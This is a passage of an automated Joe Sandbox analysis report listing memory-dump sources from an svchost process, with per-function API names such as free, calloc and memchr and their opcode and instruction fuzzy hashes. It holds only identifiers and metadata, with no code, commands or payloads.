                                                                                                                                                                                • Instruction ID: f2e97bf5557edeb036c1d8ce49a4b9bee1e653c74b7aee7a54a48cc6051c0eb5
                                                                                                                                                                                • Opcode Fuzzy Hash: 884077ace18fe05f5bcecc7e9f9f6dae5599daebb2d5e3873502e91a9f56e8dc
                                                                                                                                                                                • Instruction Fuzzy Hash: 74319065A0DA8286FB259F2DA50023EB6A0FF497E0F0C8130DB59077D5DF7CE4528744
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$memchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3776806952-0
                                                                                                                                                                                • Opcode ID: 02c686ba43c203775942fe377efec0076b58d1b9a8b4d6133827f9d1f2b2001f
                                                                                                                                                                                • Instruction ID: a0471d10f0e6768a413744d9564edd70abfa552c0a6409882e9f9d4917e31cb9
                                                                                                                                                                                • Opcode Fuzzy Hash: 02c686ba43c203775942fe377efec0076b58d1b9a8b4d6133827f9d1f2b2001f
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E21462160D78282F665AF59A8102AE7690FB8DBE4F480135DF9D43785DF3CD4568B08
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$calloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3095843317-0
                                                                                                                                                                                • Opcode ID: 3a796d053fe83774da181f9bcbb7c67fc2bdfbbec19fcfff4edb20b7d84a978c
                                                                                                                                                                                • Instruction ID: de9c75b1992155a0866a6717060b5708714d3f103a5860c3557120e329c7637f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a796d053fe83774da181f9bcbb7c67fc2bdfbbec19fcfff4edb20b7d84a978c
                                                                                                                                                                                • Instruction Fuzzy Hash: 71113736A0CB8286E7109F19E80016AA7A0FB8CBD8F4C4035EF8957B59DF3CD5528B04
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4020351045-0
                                                                                                                                                                                • Opcode ID: c3d505e1fd8a5c0bca3a6f86233f4d2133910ba55e0007f052694ca8eb1c4992
                                                                                                                                                                                • Instruction ID: 427d4420f23fa066b7d62bae12e6d1e39bfa69356ec8b8e395a892f0f019cafb
                                                                                                                                                                                • Opcode Fuzzy Hash: c3d505e1fd8a5c0bca3a6f86233f4d2133910ba55e0007f052694ca8eb1c4992
                                                                                                                                                                                • Instruction Fuzzy Hash: 4E0152B531660AC6EF48CB5AE8A071633A2B788B49FD09527D51D87360EF7DC4AD8740
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 8dc1484f854ef4df5e9d45875d14c87c2af58cdc1fcd11931562458fdfd73c88
                                                                                                                                                                                • Instruction ID: 56e05453c80d1449982e213575faea1d4819d2d8b1936d8a0d7741183c1f8796
                                                                                                                                                                                • Opcode Fuzzy Hash: 8dc1484f854ef4df5e9d45875d14c87c2af58cdc1fcd11931562458fdfd73c88
                                                                                                                                                                                • Instruction Fuzzy Hash: 79111636516B82C6D7808F29E9806A873A4F748F98F1C0135DF9E0B618CF38E4A6C754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: b7dc0de9b84a1388dac970ed4180f9ed5ee19c89fac5d45fbb706832ebc8338e
                                                                                                                                                                                • Instruction ID: baf63d3fc1de97f73de71c38c5bd1b0f5dee6d186a4ae9c969d7e7942c982bdf
                                                                                                                                                                                • Opcode Fuzzy Hash: b7dc0de9b84a1388dac970ed4180f9ed5ee19c89fac5d45fbb706832ebc8338e
                                                                                                                                                                                • Instruction Fuzzy Hash: 47014B76609BC18AE3809F29F5802B937A1FBCDFA8F080031CE9947719CF3D80A28710
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 0772742c8951584e4f2bd760c7e0ee4e3fbd957b36235999fd488c5a96c78a28
                                                                                                                                                                                • Instruction ID: b5cfeb63fe2fec4333e23f66fc6881ed2c017a2e76041a5b3a57316b8073e90e
                                                                                                                                                                                • Opcode Fuzzy Hash: 0772742c8951584e4f2bd760c7e0ee4e3fbd957b36235999fd488c5a96c78a28
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C11A236605B41C6EB449F6EE89002C73A9FF98F99B184026CF5E43768CF38D892C784
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemalloc
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3061335427-0
                                                                                                                                                                                • Opcode ID: d5f1b881495d4490a912f4499d2fb1cb3ff09ce9d0eee49eb0d95bd26c93ddc9
                                                                                                                                                                                • Instruction ID: a600cd33e2c751bea77b7d84967187f54df6bba8ce83dd519012975886737fe7
                                                                                                                                                                                • Opcode Fuzzy Hash: d5f1b881495d4490a912f4499d2fb1cb3ff09ce9d0eee49eb0d95bd26c93ddc9
                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0F922B09A8682EF958F6AF95413C62E0EF4CBD5F4C4034DB5E46794DF3CE8A28754
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                • Opcode ID: 131138c83cf837efe84475f9e0dd9e7ea10112db5ee00fc0f5f8cf2902ff40d8
                                                                                                                                                                                • Instruction ID: f08d349158e8127ba983bbf9091c22b8c07f9a7e061d26a639883b029f57580c
                                                                                                                                                                                • Opcode Fuzzy Hash: 131138c83cf837efe84475f9e0dd9e7ea10112db5ee00fc0f5f8cf2902ff40d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 6BF0B236605B41C2DB449F6AE99402873A4FB9CFD9B194121CF6E42768CF3CC8A6C754